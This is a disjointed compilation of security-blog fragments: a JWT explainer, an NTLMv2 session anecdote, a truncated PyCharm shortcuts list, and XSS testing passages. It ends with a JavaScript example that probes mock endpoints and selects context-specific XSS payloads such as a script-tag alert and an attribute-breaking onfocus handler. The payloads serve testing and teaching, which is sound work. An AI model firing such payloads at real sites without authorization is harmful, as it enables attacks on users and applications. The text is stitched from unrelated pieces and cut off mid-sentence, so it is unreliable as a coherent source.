JWT stands for JSON Web Token. After successful user authentication, the server returns a JWT in the response, and the client presents that token on subsequent API calls or when accessing protected resources. It is typically sent in the Authorization request header:
Authorization: Bearer <token>
A JWT looks like this and makes little sense to the naked eye: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.Yrp55yopmWPtFlRNYKPAXTNgvEPGI7cuDgrBcVBZXzQ
It consists of 3 parts separated by dots: the header, the payload (the claims) and the signature. Each part is base64url encoded (the URL-safe alphabet, with no padding), not encrypted, so anyone holding a token can read the header and claims; only the signature ties them to the issuer, and a server must verify it before trusting anything in the payload.
I came across a web application that uses NTLMv2 for authentication. I logged in to the application (provided my credentials for the first time) and opened the Chrome developer tools (F12) to check the requests. There was no session cookie or authorization header (Authorization: Negotiate or Authorization: Bearer) in the request. There was no other session-related information to prove that the user was logged in. I was surprised to see that the server still responded with content available only to authenticated users. I wondered how the server knew that I was logged in without any session-related data in the request.
We all use shortcuts to make things convenient and fast. I’ve been using them in different code editors like Eclipse and PyCharm. There are tons of shortcuts to choose from and it’s difficult to remember all of them. I have compiled a list of PyCharm shortcuts that we use frequently. I have carefully chosen only those shortcuts that we use every minute.
A few of the shortcuts are built in and a few of them are user-defined. In the user-defined shortcuts I have mostly used the ‘alt’ key. I felt the ‘alt’ key is rarely used in built-in shortcuts and it will make for a…
Let us look at the payloads we should use in different contexts, since a payload that fires when reflected into the HTML body does nothing when the same input lands inside an attribute value or a JavaScript string.
1. Context — body
Payload — <script>alert('xss')</script>
Cross Site Scripting, or XSS as it is popularly known, is one of the most common vulnerabilities found in web applications. It has firmly retained its spot in the OWASP Top 10 Application Security Risks — 2017. In this post, we discuss how to test for Cross Site Scripting (XSS) vulnerabilities in web apps. If you want to understand what XSS is, I recommend reading it here.
Typically, when we encounter an input field on a web page, we go straight in and insert the most loved XSS payload <script>alert('XSS')</script> to see whether an alert box pops up.
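The two XSS passages above (payloads per context, and firing `<script>alert('XSS')</script>` into every input field) share one underlying technique: find out which characters the application reflects unencoded, then choose the payload that fits that context. The following added example (not code from either post) does exactly that with a probe string instead of a live `alert`, and goes one step beyond the page's body context by also handling an attribute context. The mock endpoints, the marker string and the constructed responses are assumptions made for the example; in practice the `render` function would be an HTTP request to the page under test.

```javascript
// Added example: probe-based reflection testing for XSS.
// Reflect a marker carrying the characters XSS needs, read back which ones
// survived unencoded, and let the survivors pick the payload.

const MARK = 'zx9q';                 // unlikely to occur naturally in a response
const PROBE = `${MARK}<>"'${MARK}`;  // the four characters that matter for breaking out

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' })[c]);
}

// Constructed mock endpoints: each takes user-controlled `q` and returns HTML.
const endpoints = {
  // Context 1 on the page: reflected straight into the body, no encoding.
  bodyRaw: q => `<p>Results for ${q}</p>`,
  // Same context, correctly encoded.
  bodyEscaped: q => `<p>Results for ${escapeHtml(q)}</p>`,
  // Attribute context whose "filter" only strips angle brackets; quotes pass.
  attrPartial: q => `<input type="text" value="${q.replace(/[<>]/g, '')}">`,
  // Does not reflect the parameter at all.
  notReflected: q => '<p>Nothing here</p>',
};

// Returns null if the input is not reflected, otherwise the list of probe
// characters that came back unencoded between the two markers.
function survivingChars(render) {
  const html = render(PROBE);
  const start = html.indexOf(MARK);
  if (start === -1) return null;
  const end = html.indexOf(MARK, start + MARK.length);
  if (end === -1) return null;
  const between = html.slice(start + MARK.length, end);
  return ['<', '>', '"', "'"].filter(c => between.includes(c));
}

// Maps survivors to a payload for the two contexts covered here; null means
// no payload of this kind will work, so there is no point firing alert().
function pickPayload(context, surviving) {
  if (surviving === null) return null;
  if (context === 'body' && surviving.includes('<') && surviving.includes('>')) {
    return "<script>alert('xss')</script>";          // the page's body-context payload
  }
  if (context === 'attribute' && surviving.includes('"')) {
    return '" autofocus onfocus="alert(\'xss\')';     // close the value, add an event handler
  }
  return null;
}

// Stand-alone run: report survivors per mock endpoint.
for (const [name, render] of Object.entries(endpoints)) {
  console.log(name, survivingChars(render));
}
```

The probe tells you more than a blind `alert` does: an empty survivor list means the output is encoded for the body context, while `"` surviving in an attribute means the filter that strips `<` and `>` is not enough and an event-handler payload will still execute.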